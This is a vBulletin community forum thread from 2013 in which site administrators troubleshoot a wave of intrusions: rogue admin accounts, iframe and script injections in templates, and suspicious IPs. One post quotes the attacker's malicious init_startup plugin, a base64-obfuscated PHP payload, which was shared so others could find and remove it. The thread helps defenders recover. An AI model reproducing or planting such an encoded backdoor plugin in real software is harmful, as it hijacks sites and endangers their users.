Tweet
I'd suggest looking over these two blog posts:
-
Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
That repeated IP in your post 37.130.224.22 shows this data:
Country:
Netherlands nl
State/Region:
Noord-Holland
City:
Amsterdam
If it is NOT your location, then DELETE that IP immediately! I found yet another suspicious IP, this time located in Germany!
I haven't had serious problems with this new hack-attack. I deleted the /install folder of my forum and deleted suspicious IPs. I also changed my login data, including in /includes/config.php. We can help one another if we make public suspicious IPs and also report them.
But, then again, it struck me as well as other admins:
WHAT IF THIS NEW HACK-ATTACK ORIGINATED IN THE VB HOUSE ITSELF (E.G. FORMER DISGRUNTLED EMPLOYEES)?
Comment
-
Has to be a plugin doing that. You would have to find the plugin and delete it.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
Have had a bit of a search myself and came up with the same result.. its originating in netherlands.
37.130.224.22 - IP Tracing and IP Tracking
Want to trace or track an IP Address, host, or website easily? With our highly reliable IP Address Location Database, you can get detailed information on any IP Address anywhere in the world. Results include detailed IP address location, name of ISP, netspeed/speed of internet connection, and more.
Click for big IP address location image. It is 8:44 PM UTC when you ran this IP tracer report for 37.130.224.22 here on our website, IP-Adress.com. When it comes to 37.130.224.22, you can trust that if we have all the IP trace information possible for it, then we will display it further below to assist in your research of this IP address if available. Feel free to run another IP trace for 37.130.224.22 or a different search.
Timestamp Confirmation:
The IP tracer report for 37.130.224.22 was ran at 8:44 PM UTC on September 9, 2013 and the information is provided below if available.
Think i best have a look and see if it matches any members :?Comment
-
That didnt work very well,.. here is the link
Comment
-
One more IP to ban and thus be safer... the IP you posted, axiomaticule:
37.130.224.22 629334038 2582e016.rdns.100tb.com Hosting Services Hosting Services Network sharing device or proxy server
Recently reported forum spam source. (2)
Country:
Netherlands nl
State/Region:
Noord-Holland
City:
AmsterdamComment
-
They may have also overwritten your subscription.php. You should not be challenged with a password, there. Check to see if the size of subscription.php is different from what comes in the installation. If so, you cannot trust your files and will need to re-upload. I've seen a TON of sites hit this way
Comment
-
Ok, so I have disabled all my plugins and the problem persists.I have also over wrote all my files (was running 4.2.0 patch 2 and uploaded 4.2.1) but still have the problem. Any other suggestions?Comment
-
I have added this line to my config.php and now have access to the subscriptions section. so It has to be a plugin then? Its strange though that i disabling all the plugins does not sort the problem.Comment
-
Found it !!!
They added this plugin..
title - init_startup
Hook location - init_startup
Plugin PHP codecERWQmlxUlpXaWNENTYwSlZoZytOc1pLUkZPcnhxcm44eG5OS1NYQ0RmMm9nbnM0M2VyRGJ6cmFwK3VNZzRSZWcwcj gyNEZ6b0xoNWNsSlZoYStNZ2FuWTJCZTdtQms0c2NJck1mTFZOZmJuSjdpRDF4Y21mTkl1Yk1yOWpmYkJTNk04YUpv bERzeVBCWkdRczE4bzJtTjZDeXRienAvYnltOTBYVERhN3R0dGIzYzF1dkpXeis4OTNSdjBOMzlNM3UrQ1l1OTJRdm lXeTl0cE1UbDZQa0tPTnNhcE0xcCtmUUtBcVpqV2RkK2lwWHFqd1BVOUR4QWlDV0VPSlRnUUJCQnNqNzArTXViQUxv RGxKQVlPUUhDdnlBMlRzWTltR0VsaHNxSUFRWGIrcXVqdDBRMkg4S05ldm9RWE81VGhPMmdKeXd1dFFYMmJDb2pveH VxcWxLZWJpcUx1OHZ1dGhuVmpyUEkzMURDdHlJc09wdy9ZWUpZZ1E3TlFEdFU3ZC9pQUhsdWNsWldxTHBDREhETW1y U3plbzd2dC9GUzNRWFN4V0JvdEVhV3JQK2Z3PT0nKSkpOw0KLyogYnkgaGlqQGNrZXIgKi8='));
exit;
}
Have just disabled it and all seems to be working !Comment
-
Please read the following two blog posts:
Also please see these recent security announcements:
vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versionsComment
-
Major hackage here as well for the last two days. I *think* I've cleaned up the last of it. Similar symptoms... weird admin accounts, crazy plugins, redirects, code being inserted into templates and phrases.
Is anybody else here annoyed that we paid decent money for this (relative to other forum solutions) and have had so many security headaches?Comment
-
I have had the same problem, at 7.30 this morning.
I managed to catch and delete most of it, but I have a different page on paid subscriptions now.
The username was 30K and the IP was 178.73.207.151. and apprently came from Sweden!
They added the plugin stated above, and added URL's to mt templates (do a search for .biz or derpina in your templates). They used iframes.
I've now found a script in my header at the bottom, I've now got rid of it.
Best way I can advise to find all your issues is to go to http://quttera.com and put in a free check, it found everything on my site, and then all I needed to do was search the templates to get rid of it. If I find anymore I will let you know here.
VB, I am not happy that people are able to do this, I pay to have a site that is safe from these actions.
Is there a way to make the system email you every time someone changes something in the Admin CP? Or changes certain things (plugins, users, forums). That way we will see this happening a lot faster and get in to stop it.Last edited by rburns; Tue 10 Sep '13, 12:29am.Comment
Comment